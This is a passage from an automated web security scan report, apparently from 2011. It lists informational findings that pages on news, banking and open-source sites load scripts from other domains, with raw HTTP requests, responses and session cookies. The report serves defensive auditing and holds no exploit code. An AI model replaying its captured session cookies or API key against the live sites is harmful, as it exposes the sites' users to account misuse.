<script src='http://cdn.wibiya.com/Loaders/Loader_233701.js' type='text/javascript'></script>
...[SNIP]...
<!-- start crazzy egg code-->

<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0010/9774.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

17.163. http://www.julong.com.cn/en/News/188.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.julong.com.cn
Path:   /en/News/188.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/News/188.html HTTP/1.1
Host: www.julong.com.cn
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:16:50 GMT
Content-Length: 7312
Content-Type: text/html
Content-Location: http://www.julong.com.cn/en/News/188.html
Last-Modified: Thu, 10 Apr 2008 00:38:40 GMT
Accept-Ranges: bytes
ETag: "f4b7ea38a39ac81:7a839"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<div class="text_align_center row"><script language="javascript" type="text/javascript" src="http://js.users.51.la/446576.js"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.164. http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kansascity.com
Path:   /2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html HTTP/1.1
Host: www.kansascity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 01:13:01 GMT
ETag: "1e3db5c-e2bf-4d4a011d"
Accept-Ranges: bytes
Content-Length: 58047
Content-Type: text/html
Expires: Thu, 03 Feb 2011 01:16:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 01:16:50 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">



...[SNIP]...
<!-- this has to go after registration stuff, in case we want to override those rules -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.2/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://an.tacoda.net/an/15065/slf.js"></script>
...[SNIP]...

17.165. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macaudailytimes.com.mo
Path:   /times-lab/21109-Tragedy-our-Commons.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; path=/; domain=.macaudailytimes.com.mo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; expires=Fri, 04-Feb-2011 01:16:56 GMT; path=/; domain=.macaudailytimes.com.mo
Connection: close
Content-Type: text/html
Content-Length: 49200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
   <he
...[SNIP]...
<td width="50%">
   <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://fx-rate.net/fx-rates.php?label_type=country_name&currency=HKD&length=short"></script>
...[SNIP]...

17.166. http://www.merrilledge.com/m/pages/self-directed-investing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/pages/self-directed-investing.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=8DVPG6bhLhltEG1FjhrgafC0CcuM/mzhZg+ZO4Fn4N7V8Ap55lrmyz9HWpZ+FVMYcuGvGsLs+F8fomu+ZqybyYrEqEFhdL+uE42cL4uzTOojaJYo1xb91lRcgZUAJzx6CG+Xvv8KLTkamtoYiMO0tXoyB5SnItLVDSCnSA7T6+JH6sF9+tCBdKyH8JAxP7JQXa7Gbyn7VfXyPbdn2MQ5YjS4TDtJiHPV2n3kwEIzWscBtsEdkM6B3v1AJFdcl961XkKl4NRv+R1cnaz0OJDIgtBgBOIAH33VI4JPEq6R5KFdMBd9oeCkaZdSV/RUibkCgyKsOopPRnBjAR1ucPhGAHIGXmpmJNjH9+p+u3tPYW+y7+fq/z+YtIQ9lLGo9PuXxLw4yf2ryu0xsfnN/cX0Rv5hKpnfqHXTiFNLdooF4fwFhVRPHVGcsX4+v9NJKw1e2k91+AU0eZaak/U3SNwC2zplr+xrLUnCiOnmv5aWpBA2QRFH4sqmlb7tOVHg76fm4QmkzCNoA0wieztn3baqZD/I86Hadaelj/nZ2rgCYs8h7uYmxIEzU6VGZ7ZCF2NoBYFeb4eIZlqZ/+or03iZf/6o5LLOb37KbV8wy0Exz8cy8AP6iADkE4FsuKEzScKb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=8ddb7e626e0c4eac90fb5dc54d017916; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove--><script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script><script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...

17.167. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/pages/zero-dollar-trades.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=9sTztPG9LIpTqCRqm5C/4EacAM+v7Pe04GMW3r5atCVT71fZQlEkwugZOjyBvesjG5IMK7yC4z+rzi52Y2Rwfzioa6Te7w2siYkFLhTMBHilWY4Q6yBX7NgBAxU1BK1JRv0vK2haKUjfkBFQ4hSjXxU9DS2ElZwfKBDrfdwYRG/DfEkCZMfk7kOOv3/RCE7cXyczgqEb3jGq+lq14GXRid9xAckqjAw8nQQDb9QtElhfHjwQ13IMhVRuoNSl34XxSizadDPOfV5ROZ9ptH3YDolLXCkbRu+2t6/lBdbbpFWsJfJ7DclHs5472SkUIqFunvN7HfcOWkpUEeNtSZ86pP6LYe5ksGeClXhKqiGCumb0CdjphGaPavyyAa243o79JwOyKse04wKOloP6arxbLtLk8Av0o1NQ83V+rPNWmGvpKCtw6q5AOnDFr0JExL5pwuLMU8GXOq6LvQgdydKKEwi+kzu5A1cR6YW039SrUi8/P+OwrPBM58oY2ykRFCUTfS/jIs7yDuiPlaUSz7jJgCcALG0fDiV5utWLvZc+vNv6B+ra0Q3k7FFXg0vIFIJeSnPCAFTMbKDD5mSYSR/gvNgzHO5QN5BLiw3cG1uC2DYUEcY+zcFJ4hObnWi8iqYb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=fc00ac76623c478fade3bfb4e83564ed; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove-->
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script>
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...

17.168. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=+3nYGeeE+NPdhSQG3vh+HTqhnIVv2HDbcYHGjp54fTB2eN8gWiB5w9oZxieXINxyqp5JOkWFYpxYSlEUp+s/Q7dr/qI2dW4+Ugpj9Ak4HneKuqAmlrb9+b1lkfb5z1x01mFDUVUSIPYlzqUceh73FNi2dPFIGUKgIrS5YIX0VBG3Kvli+WXEUzA7MvB4u5+Py7hXzFl2ORnsgVAu/Q1zWhLJKMtsBGrF/kIITSL0QaUJLsFt1mJRkosThEinabeRLDNi7M3YfO8wlKzm7S/B4D7p2u5Ayo2RQLBc18md65QkSsQY684a0I+0n4l2tFejlKie8oTEEzEd1h4/38tbkAQPmqC7kZDPfpNiMp3x7g7+sQ9iY5IsI0nIEkrpqitpkAvfVRHp/q7rPO7Eb1rSSTXtThYXqMEQsxKQIVS0AC82nDR2hbKY7xCDjqXsAEHo8nuo3VN2ebUSNpzuny4qEnUzC7b+k3WQKNy5wsp07CNxBAJQojRx5NQNw1xQyJfaQ6R8CsLqvuK9to/Ypp9xRkRlF27tPV9g2nrXGMcvOFz5HQIJqD5zfSuYF1SPhTc5tj8W5U6dRGuwHkHGPzos1a1H98yr4g+RpcHn8DNPXR1oSvecaDlW11MMEwLXbB4Q; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=6e232d9b30534bdfa9d614bf9ec5848f; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<DIV id=pollhome>


<SCRIPT src="https://secure.polldaddy.com/p/4280635.js" type=text/javascript charset=utf-8></SCRIPT>
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove-->
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script>
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...

17.169. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=KDC8DK5B+KFv3Wz0S4K2LXSI4NgojmEdX2lulfZHWNW5jh+8BzJJh8KHjWLs1JqTo+0StslhsZtq4lyyEMIl0GAzy4I5jHURcU1INosJRPZPUqnycZXXkgvlWX/bMnXF1SioazWzlZBumjo782mfcGOSGzZ6T2j52k8DJwFasAcEq6ZcsHEQxgNk+ah8BOdvTcviU2WAGv0G+CeQus7N0onu+TGDhQ0W39ik0Cg9UB3KRVXs2KbKjqellsaunYWAIq1kwbkhHpHXGKLQUsg3glJkNpgNxmSQiWiC4o+mK7ggegysuL3PcK5zTI1Iw9XexI9N8wLqYLNQUz/0jdrKZmkQ0Ip2Zm1FhMKWvXjkVhktzIcKIr/IcMNQa8XEdZ7JERXHmTOamI52E0ET2IBtTGVVEeUOdGrvQiyegTguDsbQD4MSTWmYQ7ZXGSyXgruiBshchcGbOLHIKS6SvFT7pgjTnLK9JScdNdpYCvCG9cjkUtFjpNOSVxi1bKz5Xu8TO49YSSs9iFmlCix8Q1nG2I+rzTBtxIyWVW1GT9AoeRDYu5HzhJKISmwaX2qvWrTBe014K56+FA4eWCo9BOF9XQlpxTB1WpVbsoxwa3Rg7LNsq9S1GpNb8XRTJtfcmDvw; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx
Set-Cookie: pxs=671d45371feb47b7b0d445f52cd92025; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove--><script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script><script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...

17.170. http://www.monstersandcritics.com/news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.monstersandcritics.com
Path:   /news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species HTTP/1.1
Host: www.monstersandcritics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:12 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 39221

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Greens slam Hong Kon
...[SNIP]...
<!-- END #navigation -->

<script type="text/javascript" language="javascript" src="http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=300202374&adSize=970x66"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014974859152809438434%3Adlqye5xr6pg"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div><script src="http://js-kit.com/for/monstersandcritics.com/comments.js"></script>
...[SNIP]...
<!-- slotname=ad_leaderboard, option_id=0 --><script type="text/javascript" language="javascript" src="http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=300202374&adSize=728x90"></script>
...[SNIP]...
<!-- slotname=ad_article_box_right_side, option_id=0 --><script type="text/javascript" language="javascript" src="http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=300202374&adSize=300x250,300x600"></script>
...[SNIP]...
<!-- slotname=ad_article_tower_right_side, option_id=0 --><script type="text/javascript" language="javascript" src="http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=300202374&adSize=160x600"></script>
...[SNIP]...
</script>
<script src="http://www8.glam.com/js/widgets/brash_logo.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Start Glam tag -->
<script type="text/javascript" language="javascript" src="http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=300202374&adSize=888x14"></script>
...[SNIP]...
</script> <script src='http://view.picapp.com//JavaScripts/OTIjs.js' type='text/javascript'></script>
...[SNIP]...

17.171. http://www.news.com.au/business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.news.com.au
Path:   /business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916 HTTP/1.1
Host: www.news.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 84114
Content-Type: text/html;charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:22:21 GMT
Date: Thu, 03 Feb 2011 01:17:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-au" lang="en-au">
<hea
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.css" />
               <script type="text/javascript" src="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js"></script>
...[SNIP]...

17.172. http://www.nickstakenburg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nickstakenburg.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.nickstakenburg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 8741
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Date: Thu, 03 Feb 2011 01:17:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Nick Stakenburg : Web Developer and Illustrator</title
...[SNIP]...
<link rel="stylesheet" type="text/css" href='/projects/lightview/css/lightview.css' />

<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/prototype/1/prototype.js'></script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1/scriptaculous.js'></script>
...[SNIP]...

17.173. http://www.nickstakenburg.com/projects/lightview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nickstakenburg.com
Path:   /projects/lightview/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/lightview/ HTTP/1.1
Host: www.nickstakenburg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 46971
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Date: Thu, 03 Feb 2011 01:17:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lightview</title>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Lightview Changelog RSS 2.0" href="http://feeds.feedburner.com/nickstakenburg/lightview/changelog" />

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>

<link rel="stylesheet" type="text/css" href="css/lightview.css" />

<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/prototype/1/prototype.js'></script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1/scriptaculous.js'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

17.174. http://www.opensource.org/licenses/gpl-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:53 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3gpidtp18sji9mbnc5ikeu67s3; expires=Sat, 26-Feb-2011 01:34:13 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 02 Feb 2011 21:49:54 GMT
ETag: "6ad65b857b676f9bc4304e9a1542a297"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.175. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:52 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=42d1eq3k1jalsbr539va4riur5; expires=Sat, 26-Feb-2011 01:34:12 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 02 Feb 2011 21:46:24 GMT
ETag: "c8a6b2f76573aab17765d5878645eca9"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.176. http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opposingviews.com
Path:   /i/bluefin-tuna-sells-for-400-000-in-tokyo-market

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /i/bluefin-tuna-sells-for-400-000-in-tokyo-market HTTP/1.1
Host: www.opposingviews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 01:03:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: _ov_session=64b74e55022e8f00d67cea831fd6db0f; path=/; HttpOnly
Status: 200
ETag: "423d159a767d9a264e6ea796390090aa"
X-Runtime: 415
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 33258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Ch
...[SNIP]...
</script>
<script src="http://s7.addthis.com/js/250/addthis_widget.js#pub=misterfine" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&source=uds-vsw&key=ABQIAAAAL35lsN9b3mb7-fybH7GOqhTqdG_6wdvSV0Fo_gz23981KZO1yRQK66E6lXRJsL0nxP40YXi984MYsg"
type="text/javascript">
</script>
...[SNIP]...
</script>
<script src="http://www.google.com/uds/solutions/videosearch/gsvideosearch.js?mode=new"
type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

17.177. http://www.perishablenews.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perishablenews.com
Path:   /index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.php?article=0012418 HTTP/1.1
Host: www.perishablenews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Tuna Fight Muddies Wat
...[SNIP]...
<!-- Site Meter -->
<script type="text/javascript" src="http://s28.sitemeter.com/js/counter.js?site=s28perishablenews">
</script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...

17.178. https://www.pnc.com/webapp/unsec/Homepage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Homepage.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Personal HTTP/1.1
Host: www.pnc.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
